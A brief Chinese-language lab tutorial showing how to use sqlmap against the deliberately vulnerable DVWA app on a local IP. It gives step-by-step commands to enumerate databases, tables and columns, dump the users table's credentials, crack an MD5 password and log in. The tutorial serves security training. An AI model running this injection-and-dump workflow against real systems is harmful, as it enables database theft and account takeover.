工具使用 | sqlmap的簡單使用–以DVWA為靶場
- 2019 年 10 月 7 日
- 筆記
0x00 找到注入點
http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

0x01 利用sqlmap進行注入
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"

期間會遇到一些詢問,可以自己判斷是還是否,也可以一路回車,最後將會顯示出靶機的一些相關信息,比如數據庫版本、系統類型等

利用—dbs參數獲取數據庫信息
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" --dbs

利用-D指定數據庫,—tables查看該數據庫下所有表
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa --tables

利用-T指定表,—colums查看該表下所有列
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa -T users --columns

最後利用-C指定列,—dump進行脫褲
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa -T users -C user,password --dump

對密碼的MD5值進行解密,這裡以pablo用戶的密碼MD5值為例

0x02 利用爆出的用戶名密碼登陸系統
利用Sqlmap爆出的用戶pablo,密碼letmein進行登陸

成功登陸,關於sqlmap的用法還有很多,這裡只介紹了最為常見的一種。